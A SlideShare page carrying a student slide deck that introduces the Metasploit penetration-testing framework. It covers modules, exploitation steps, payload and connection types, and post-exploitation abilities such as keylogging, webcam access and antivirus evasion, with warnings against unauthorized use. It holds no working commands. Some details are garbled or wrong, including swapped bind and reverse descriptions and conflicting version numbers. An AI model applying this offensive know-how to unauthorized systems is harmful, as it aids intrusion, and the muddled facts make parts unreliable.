SlideShare a Scribd company logo

Metasploit

Download as PPTX, PDF
Lalith Sai
Lalith Sai

The document provides an overview of the Metasploit framework. It describes Metasploit as an open-source penetration testing software that contains exploits, payloads, and other tools to help identify vulnerabilities. Key points covered include Metasploit's architecture and modules for scanning, exploitation, and post-exploitation. Examples of tasks that can be performed include port scanning, vulnerability assessment, exploiting known issues, and gaining access to systems using payloads and meterpreter sessions. The document warns that Metasploit should only be used for legitimate security testing and cautions about the potential risks if misused.

Presentations & Public Speaking
1 of 39
METASPLOIT
Useful terminology: • Vulnerability: A weakness in the target system, through which penetration can successfully occur. • Exploit: Once a vulnerability is known, an attacker takes advantage of it, and breaks into the system using a code/script known as an exploit. EXPLOIT = VULNERABILITY + PAYLOAD • Payload: This is a set of tasks initiated by the attacker subsequent to an exploit, in order to maintain access to the compromised system • CLI: command line interface • GUI: graphical user interface • MSF: Meta Sploit Framework
WARNINGS Metasploit is very powerful, and very dangerous I used VMWare to isolate the operating system from other systems and the internet Use of this on any unauthorized way will get you fired / arrested / deported etc...
HISTORY OF THE METASPLOIT PROJECT • Metasploit Project –HD Moore & Friends –A community-driven project since 2003 • Rapid7 –Maker of NeXpose Vulnerability Management –Purchase the Project from HD • Metasploit Framework –The original open -source exploit framework
THIS VIDEO INVOLVES • Usage of METASPLOIT • Social engineering • Organization's server crashes from a DoS attack • Honeypots • Difference between White hat and Black hat hacker • Data breaching
METASPLOIT TOPICS Fundamentals about Metasploit Framework Usage Scanning Exploitation Post Exploitation Writing Metasploit Modules
WHAT IS METASPLOIT? • Metasploit Framework, created by the Metasploit Project, is the most popular exploitation tool available for developing, testing, and performing exploits. It allows penetration testers, auditors, and vulnerability assessment personnel to create their own penetration testing systems and exploit modules. • It is A collaboration between the open source community and Rapid7 • An exploitation framework written in Ruby, currently at version 4.9.1 • It’s modular • Contains exploits, payloads, encoders and auxiliaries
METASPLOIT EDITIONS
METASPLOIT VERSIONS •1.0 released in 2003 (Perl) •2.0 released in 2004 (Better Perl) –2.7 released in late 2006 •3.0 released in 2007 (Ruby) –3.2 released in late 2008 –3.3 released in late 2009 –3.4 released in early 2010 –3.4.1 is the most recent release •Metasploit now has 567 exploits and 283 auxiliary modules (up from 551 and 261 in v3.4)
VERSIONS AND BASICS - Metasploit Framework Edition • The free version - Metasploit Community Edition • A free, web-based user interface for Metasploit - Metasploit Express • An open-core commercial edition for security teams who need to verify vulnerabilities - Metasploit Pro • An open-core commercial Metasploit edition for penetration testers - Armitage • Is a graphical cyber attack management tool for the Metasploit Project that visualizes targets and recommends exploits.
• Runs on any operating system -Source code for Linux / Unix / MacOS X -Portable to Windows via CYGWIN • Allows anyone to exploit & usually “root” certain machines with only an IP address and a basic background of the system • Requires no knowledge of the software bug, or exploit machine cod
ARCHITECTURE OF METASPLOIT
WITH METASPLOIT, YOU CAN PERFORM THE FOLLOWING OPERATIONS Conduct basic penetration tests on small networks Run spot checks on the exploitability of vulnerabilities Discover the network or import data Browse exploit modules and run individual exploits on hosts.
HIERARCHY BUILDS UP LIKE THIS
• Auxiliary modules – are used for information gathering, enumeration, port scanning and that sort of thing. There are plenty of useful tools in there too for things like connecting to SQL databases and even tools for performing man-in- middle attacks. • Exploit modules – are generally used to deliver exploit code to a target system. • Post modules – offer post exploitation tools such as the ability to extract password hashes and access tokens and even modules for things like taking a screenshot, logging and downloading files. • Payload modules – are used to create malicious payloads for use with an exploit
AUXILIARY • Typically, an Exploit without Payload is called Auxiliary. • Used for scanning, fuzzing, and some automated tasks. • Makes use of mixins. • To run type in Run.
ENCODERS • To evade anti-viruses encoders are used. • Payload’s are encrypted
NOPS • Mainly used to keep the size of the payload consistent. • Having 10 nops.
SCANNING USING METASPLOIT • Discovery Through Vulnerability Scanning Vulnerability scanning will allow you to quickly scan a target IP range looking for known vulnerabilities, giving a penetration tester a quick idea of what attacks might be worth conducting. • Port Scanning: A port scan is a series of messages sent by someone attempting to break into a computer to learn which computer network services, each associated with a “well- known” port number, the computer provides. Port scanning, a favorite approach of computer cracker, gives the assailant an idea where to probe for weaknesses.
HOW A DISCOVERY SCAN WORKS A discovery scan can be divided into four distinct phases: • Ping scan - determines if the hosts are online • Port scan - identify the ports that are open and the services are available on those ports • OS and version detection - detects the service version numbers and operating system based on how the system responds to the probes • Data import - collects all the data and creates a report and imports the data into the project
EXPLOITATION An exploit is the use of software, data, or commands to “exploit” a weakness in a computer system or program to carry out some of malicious intent, such as a denial-of-service attack, Trojan worms or viruses. The weakness in the system can be a bug, a or simply a design vulnerability. The process is known as exploitation. The following are the five steps in the exploitation process: scanning the target selecting an exploit selecting a payload encoding the exploit launching the attack
• Scanning the target To scan the target, we use port scanning and vulnerability scanning techniques in which we perform scanning by using different tools like nmap, nessus and etc. • Selecting the exploit This process includes the selection of exploit. • Selecting the payload Payloads are the commands the attacker runs upon a successful completion of their exploit. • Encoding the exploit Encoding in Metasploit is how the exploit and payload are packaged together, and is often done automatically, via the set commands. Launching the attack Once all the settings have been set, the attacker simply calls an exploit.
EXPLOITING VULNERABILITIES: Metasploit offers a couple different methods you can use to perform exploitation: Auto-exploitation. Manual exploitation. Auto-Exploitation: The auto-exploitation feature cross-references open services, vulnerability references, and fingerprints to find matching exploits. The simple goal of auto-exploitation is to get a session as quickly as possible by leveraging the data that Metasploit has for the target hosts. Manual Exploitation: Manual exploitation provides a more targeted and methodical approach exploiting vulnerabilities. This method is particularly useful if there is a specific vulnerability that you want to exploit.
Payload Type: Specifies the type of payload that the exploit will deliver to the target. Choose one of the following payload types: • Command: A command execution payload that enables you to execute commands on the remote machine. • Meterpreter: An advanced payload that provides a command line that enables you to deliver commands and inject extensions on the fly.
Connection Type: Specifies how you want your Metasploit instance to connect to the target. Choose one of the following connection types: • Auto: Automatically uses a bind connection when NAT is detected; otherwise, a reverse connection is used. • Bind: Uses a bind connection, which is useful when the targets are behind a firewall or a NAT gateway. • Reverse: Uses a reverse connection, which is useful if your system is unable to initiate connections to the targets.
• LHOST: Defines the address for the local host. • LPORT: Defines the ports that you want to use for reverse connections. • RHOST: Defines the target address. • RPORT: Defines the remote port you want to attack. • Target Settings: Specifies the target operating system and version. • Exploit Timeout: Defines the timeout in minutes.
POST EXPLOITATION • Post exploitation is an important process in a penetration test as it allows the attacker to gather information from the system that he has exploited. A lot of penetration testers are using the Metasploit framework modules for system exploitation. However, Metasploit provides and modules for post exploitation activities for a variety of systems. • Margate's to another process which has admin privileges and then completes the task.
• Using this meterpreter we can perform different tasks by getting the privileges of the victim • Can grab a screen shot’s, keylogging by loading and much more with -Espia -Incognito -Pivot -Sniffer -Priv -Stdapi (By Default)
• What else we can do in post exploitation? Let’s list some of them, -Keylogging -Screen shots -view live screen -access webcam -take control of keyboard and mouse -del user -pivort -vm detection and many more..
• Advantages Open source Frequently updated • Disadvantages Difficult to learn Can crash your system if not used wisely Requires deep knowledge for exploit development
IT IS USEFUL FOR  Future penetration testers  Vulnerability assessment personnel  Security Engineers  Security Researchers  Auditors  Programmers  Any IT professional who has to test regularly to maintain compliance requirements  Any IT professional who runs scheduled testing of security infrastructure as a best practice
SUMMARY • Metasploit is very easy to use, and very powerful • Web interface allows the scans to be run from any system, on any operating system • Evidence may or may not be left behind on the system • IDS/IPS will sense these exploits • Only contains old & well known exploits
NOTE • Never misuse it your personal purpose • Use it wisely • Understand the modules before using • Test it using virtual machines
REFERENCE • https://resources.infosecinstitute.com • https://www.offensive-security.com/metasploit-unleashed/ • https://www.cybrary.it/course/metasploit/
THANK YOU
Metasploit

Recommended

Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network Security
Ashok Reddy Medikonda
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
Deepanshu Gajbhiye
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
GTU
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & Metasploit
Raghav Bisht
 
Metasploit
MetasploitMetasploit
Metasploit
Institute of Information Security (IIS)
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
henelpj
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
M.Syarifudin, ST, OSCP, OSWP
 

Recommended

Metasploit framework in Network Security
Metasploit framework in Network SecurityMetasploit framework in Network Security
Metasploit framework in Network Security
Ashok Reddy Medikonda
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
Deepanshu Gajbhiye
 
Introduction to Metasploit
Introduction to MetasploitIntroduction to Metasploit
Introduction to Metasploit
GTU
 
Introduction To Exploitation & Metasploit
Introduction To Exploitation & MetasploitIntroduction To Exploitation & Metasploit
Introduction To Exploitation & Metasploit
Raghav Bisht
 
Metasploit
MetasploitMetasploit
Metasploit
Institute of Information Security (IIS)
 
Metasploit seminar
Metasploit seminarMetasploit seminar
Metasploit seminar
henelpj
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
M.Syarifudin, ST, OSCP, OSWP
 
Metasploit
MetasploitMetasploit
Metasploit
henelpj
 
Metaploit
MetaploitMetaploit
Metaploit
Ajinkya Pathak
 
Metasploit
MetasploitMetasploit
Metasploit
Parth Sahu
 
Malware analysis
Malware analysisMalware analysis
Malware analysisPrakashchand Suthar
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploit
Aashish R
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar
 
Malware Static Analysis
Malware Static AnalysisMalware Static Analysis
Malware Static Analysis
Hossein Yavari
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with Metasploit
Mohammed Danish Amber
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Nezar Alazzabi
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration Testing
Mohammed Adam
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
Application Threat Modeling
Application Threat ModelingApplication Threat Modeling
Application Threat Modeling
Priyanka Aash
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
DARSHANBHAVSAR14
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testing
Abu Sadat Mohammed Yasin
 
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Sam Bowne
 
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic AnalysisCNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
Sam Bowne
 
IDS and IPS
IDS and IPSIDS and IPS
IDS and IPSSantosh Khadsare
 
Yow connected developing secure i os applications
Yow connected developing secure i os applicationsYow connected developing secure i os applications
Yow connected developing secure i os applications
mgianarakis
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
Mostafa Abdel-sallam
 
Malware- Types, Detection and Future
Malware- Types, Detection and FutureMalware- Types, Detection and Future
Malware- Types, Detection and Future
karanwayne
 
Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
Anurag Srivastava
 
Metasploit Computer security testing tool
Metasploit Computer security testing toolMetasploit Computer security testing tool
Metasploit Computer security testing tool
medoelkang600
 

More Related Content

What's hot

Metasploit
MetasploitMetasploit
Metasploit
henelpj
 
Metaploit
MetaploitMetaploit
Metaploit
Ajinkya Pathak
 
Metasploit
MetasploitMetasploit
Metasploit
Parth Sahu
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploit
Aashish R
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar
 
Malware Static Analysis
Malware Static AnalysisMalware Static Analysis
Malware Static Analysis
Hossein Yavari
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with Metasploit
Mohammed Danish Amber
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Nezar Alazzabi
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration Testing
Mohammed Adam
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
Application Threat Modeling
Application Threat ModelingApplication Threat Modeling
Application Threat Modeling
Priyanka Aash
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
DARSHANBHAVSAR14
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testing
Abu Sadat Mohammed Yasin
 
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Sam Bowne
 
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic AnalysisCNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
Sam Bowne
 
Yow connected developing secure i os applications
Yow connected developing secure i os applicationsYow connected developing secure i os applications
Yow connected developing secure i os applications
mgianarakis
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
Mostafa Abdel-sallam
 
Malware- Types, Detection and Future
Malware- Types, Detection and FutureMalware- Types, Detection and Future
Malware- Types, Detection and Future
karanwayne
 

What's hot (20)

Metasploit
MetasploitMetasploit
Metasploit
 
Metaploit
MetaploitMetaploit
Metaploit
 
Metasploit
MetasploitMetasploit
Metasploit
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
Penetration testing using metasploit
Penetration testing using metasploitPenetration testing using metasploit
Penetration testing using metasploit
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Malware Static Analysis
Malware Static AnalysisMalware Static Analysis
Malware Static Analysis
 
Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with Metasploit
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
Network Penetration Testing
Network Penetration TestingNetwork Penetration Testing
Network Penetration Testing
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Application Threat Modeling
Application Threat ModelingApplication Threat Modeling
Application Threat Modeling
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testing
 
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
Practical Malware Analysis: Ch 0: Malware Analysis Primer & 1: Basic Static T...
 
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic AnalysisCNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
CNIT 126 2: Malware Analysis in Virtual Machines & 3: Basic Dynamic Analysis
 
IDS and IPS
IDS and IPSIDS and IPS
IDS and IPS
 
Yow connected developing secure i os applications
Yow connected developing secure i os applicationsYow connected developing secure i os applications
Yow connected developing secure i os applications
 
01 Metasploit kung fu introduction
01 Metasploit kung fu introduction01 Metasploit kung fu introduction
01 Metasploit kung fu introduction
 
Malware- Types, Detection and Future
Malware- Types, Detection and FutureMalware- Types, Detection and Future
Malware- Types, Detection and Future
 

Similar to Metasploit

Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
Anurag Srivastava
 
Metasploit Computer security testing tool
Metasploit Computer security testing toolMetasploit Computer security testing tool
Metasploit Computer security testing tool
medoelkang600
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit frameworkLe Quyen
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
n|u - The Open Security Community
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesAmit Kumbhar
 
Eliz seminar
Eliz seminar Eliz seminar
Eliz seminar
henelpj
 
Metasploit Demo
Metasploit DemoMetasploit Demo
Metasploit Demo
n|u - The Open Security Community
 
Chapter 9 system penetration [compatibility mode]
Chapter 9 system penetration [compatibility mode]Chapter 9 system penetration [compatibility mode]
Chapter 9 system penetration [compatibility mode]
Setia Juli Irzal Ismail
 
Ethical hacking basics
Ethical hacking basicsEthical hacking basics
Ethical hacking basics
BHAWESH RAJPAL
 
Introduction to metasploit
Introduction to metasploitIntroduction to metasploit
Introduction to metasploit
GTU
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
Hammad Ahmed Khawaja
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerShellmates
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
Raghav Bisht
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploitwozgeass
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
ClubHack
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android Demo
Arpit Agarwal
 
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
Prajwal Panchmahalkar
 
Metapwn
MetapwnMetapwn
Metapwn
n|u - The Open Security Community
 
Malware Classification and Analysis
Malware Classification and AnalysisMalware Classification and Analysis
Malware Classification and Analysis
Prashant Chopra
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
RohitGautam261127
 

Similar to Metasploit (20)

Metasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With MetasploitMetasploit (Module-1) - Getting Started With Metasploit
Metasploit (Module-1) - Getting Started With Metasploit
 
Metasploit Computer security testing tool
Metasploit Computer security testing toolMetasploit Computer security testing tool
Metasploit Computer security testing tool
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Exploits Attack on Windows Vulnerabilities
Exploits Attack on Windows VulnerabilitiesExploits Attack on Windows Vulnerabilities
Exploits Attack on Windows Vulnerabilities
 
Eliz seminar
Eliz seminar Eliz seminar
Eliz seminar
 
Metasploit Demo
Metasploit DemoMetasploit Demo
Metasploit Demo
 
Chapter 9 system penetration [compatibility mode]
Chapter 9 system penetration [compatibility mode]Chapter 9 system penetration [compatibility mode]
Chapter 9 system penetration [compatibility mode]
 
Ethical hacking basics
Ethical hacking basicsEthical hacking basics
Ethical hacking basics
 
Introduction to metasploit
Introduction to metasploitIntroduction to metasploit
Introduction to metasploit
 
Pentesting with linux
Pentesting with linuxPentesting with linux
Pentesting with linux
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama Elhamer
 
Introduction To Ethical Hacking
Introduction To Ethical HackingIntroduction To Ethical Hacking
Introduction To Ethical Hacking
 
24 33 -_metasploit
24 33 -_metasploit24 33 -_metasploit
24 33 -_metasploit
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android Demo
 
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
 
Metapwn
MetapwnMetapwn
Metapwn
 
Malware Classification and Analysis
Malware Classification and AnalysisMalware Classification and Analysis
Malware Classification and Analysis
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
 

Recently uploaded

Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdfBonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
khadija278284
 
Getting started with Amazon Bedrock Studio and Control Tower
Getting started with Amazon Bedrock Studio and Control TowerGetting started with Amazon Bedrock Studio and Control Tower
Getting started with Amazon Bedrock Studio and Control Tower
Vladimir Samoylov
 
Announcement of 18th IEEE International Conference on Software Testing, Verif...
Announcement of 18th IEEE International Conference on Software Testing, Verif...Announcement of 18th IEEE International Conference on Software Testing, Verif...
Announcement of 18th IEEE International Conference on Software Testing, Verif...
Sebastiano Panichella
 
0x01 - Newton's Third Law: Static vs. Dynamic Abusers
0x01 - Newton's Third Law: Static vs. Dynamic Abusers0x01 - Newton's Third Law: Static vs. Dynamic Abusers
0x01 - Newton's Third Law: Static vs. Dynamic Abusers
OWASP Beja
 
Acorn Recovery: Restore IT infra within minutes
Acorn Recovery: Restore IT infra within minutesAcorn Recovery: Restore IT infra within minutes
Acorn Recovery: Restore IT infra within minutes
IP ServerOne
 
Eureka, I found it! - Special Libraries Association 2021 Presentation
Eureka, I found it! - Special Libraries Association 2021 PresentationEureka, I found it! - Special Libraries Association 2021 Presentation
Eureka, I found it! - Special Libraries Association 2021 Presentation
Access Innovations, Inc.
 
somanykidsbutsofewfathers-140705000023-phpapp02.pptx
somanykidsbutsofewfathers-140705000023-phpapp02.pptxsomanykidsbutsofewfathers-140705000023-phpapp02.pptx
somanykidsbutsofewfathers-140705000023-phpapp02.pptx
Howard Spence
 
Bitcoin Lightning wallet and tic-tac-toe game XOXO
Bitcoin Lightning wallet and tic-tac-toe game XOXOBitcoin Lightning wallet and tic-tac-toe game XOXO
Bitcoin Lightning wallet and tic-tac-toe game XOXO
Matjaž Lipuš
 
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Orkestra
 
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
OECD Directorate for Financial and Enterprise Affairs
 
International Workshop on Artificial Intelligence in Software Testing
International Workshop on Artificial Intelligence in Software TestingInternational Workshop on Artificial Intelligence in Software Testing
International Workshop on Artificial Intelligence in Software Testing
Sebastiano Panichella
 
Obesity causes and management and associated medical conditions
Obesity causes and management and associated medical conditionsObesity causes and management and associated medical conditions
Obesity causes and management and associated medical conditions
Faculty of Medicine And Health Sciences
 
Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Doctoral Symposium at the 17th IEEE International Conference on Software Test...Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Sebastiano Panichella
 

Recently uploaded (13)

Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdfBonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
Bonzo subscription_hjjjjjjjj5hhhhhhh_2024.pdf
 
Getting started with Amazon Bedrock Studio and Control Tower
Getting started with Amazon Bedrock Studio and Control TowerGetting started with Amazon Bedrock Studio and Control Tower
Getting started with Amazon Bedrock Studio and Control Tower
 
Announcement of 18th IEEE International Conference on Software Testing, Verif...
Announcement of 18th IEEE International Conference on Software Testing, Verif...Announcement of 18th IEEE International Conference on Software Testing, Verif...
Announcement of 18th IEEE International Conference on Software Testing, Verif...
 
0x01 - Newton's Third Law: Static vs. Dynamic Abusers
0x01 - Newton's Third Law: Static vs. Dynamic Abusers0x01 - Newton's Third Law: Static vs. Dynamic Abusers
0x01 - Newton's Third Law: Static vs. Dynamic Abusers
 
Acorn Recovery: Restore IT infra within minutes
Acorn Recovery: Restore IT infra within minutesAcorn Recovery: Restore IT infra within minutes
Acorn Recovery: Restore IT infra within minutes
 
Eureka, I found it! - Special Libraries Association 2021 Presentation
Eureka, I found it! - Special Libraries Association 2021 PresentationEureka, I found it! - Special Libraries Association 2021 Presentation
Eureka, I found it! - Special Libraries Association 2021 Presentation
 
somanykidsbutsofewfathers-140705000023-phpapp02.pptx
somanykidsbutsofewfathers-140705000023-phpapp02.pptxsomanykidsbutsofewfathers-140705000023-phpapp02.pptx
somanykidsbutsofewfathers-140705000023-phpapp02.pptx
 
Bitcoin Lightning wallet and tic-tac-toe game XOXO
Bitcoin Lightning wallet and tic-tac-toe game XOXOBitcoin Lightning wallet and tic-tac-toe game XOXO
Bitcoin Lightning wallet and tic-tac-toe game XOXO
 
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
Sharpen existing tools or get a new toolbox? Contemporary cluster initiatives...
 
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
Competition and Regulation in Professional Services – KLEINER – June 2024 OEC...
 
International Workshop on Artificial Intelligence in Software Testing
International Workshop on Artificial Intelligence in Software TestingInternational Workshop on Artificial Intelligence in Software Testing
International Workshop on Artificial Intelligence in Software Testing
 
Obesity causes and management and associated medical conditions
Obesity causes and management and associated medical conditionsObesity causes and management and associated medical conditions
Obesity causes and management and associated medical conditions
 
Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Doctoral Symposium at the 17th IEEE International Conference on Software Test...Doctoral Symposium at the 17th IEEE International Conference on Software Test...
Doctoral Symposium at the 17th IEEE International Conference on Software Test...
 

Metasploit

  • 2. Useful terminology: • Vulnerability: A weakness in the target system, through which penetration can successfully occur. • Exploit: Once a vulnerability is known, an attacker takes advantage of it, and breaks into the system using a code/script known as an exploit. EXPLOIT = VULNERABILITY + PAYLOAD • Payload: This is a set of tasks initiated by the attacker subsequent to an exploit, in order to maintain access to the compromised system • CLI: command line interface • GUI: graphical user interface • MSF: Meta Sploit Framework
  • 3. WARNINGS Metasploit is very powerful, and very dangerous I used VMWare to isolate the operating system from other systems and the internet Use of this on any unauthorized way will get you fired / arrested / deported etc...
  • 4. HISTORY OF THE METASPLOIT PROJECT • Metasploit Project –HD Moore & Friends –A community-driven project since 2003 • Rapid7 –Maker of NeXpose Vulnerability Management –Purchase the Project from HD • Metasploit Framework –The original open -source exploit framework
  • 5.
  • 6. THIS VIDEO INVOLVES • Usage of METASPLOIT • Social engineering • Organization's server crashes from a DoS attack • Honeypots • Difference between White hat and Black hat hacker • Data breaching
  • 7.
  • 8. METASPLOIT TOPICS Fundamentals about Metasploit Framework Usage Scanning Exploitation Post Exploitation Writing Metasploit Modules
  • 9. WHAT IS METASPLOIT? • Metasploit Framework, created by the Metasploit Project, is the most popular exploitation tool available for developing, testing, and performing exploits. It allows penetration testers, auditors, and vulnerability assessment personnel to create their own penetration testing systems and exploit modules. • It is A collaboration between the open source community and Rapid7 • An exploitation framework written in Ruby, currently at version 4.9.1 • It’s modular • Contains exploits, payloads, encoders and auxiliaries
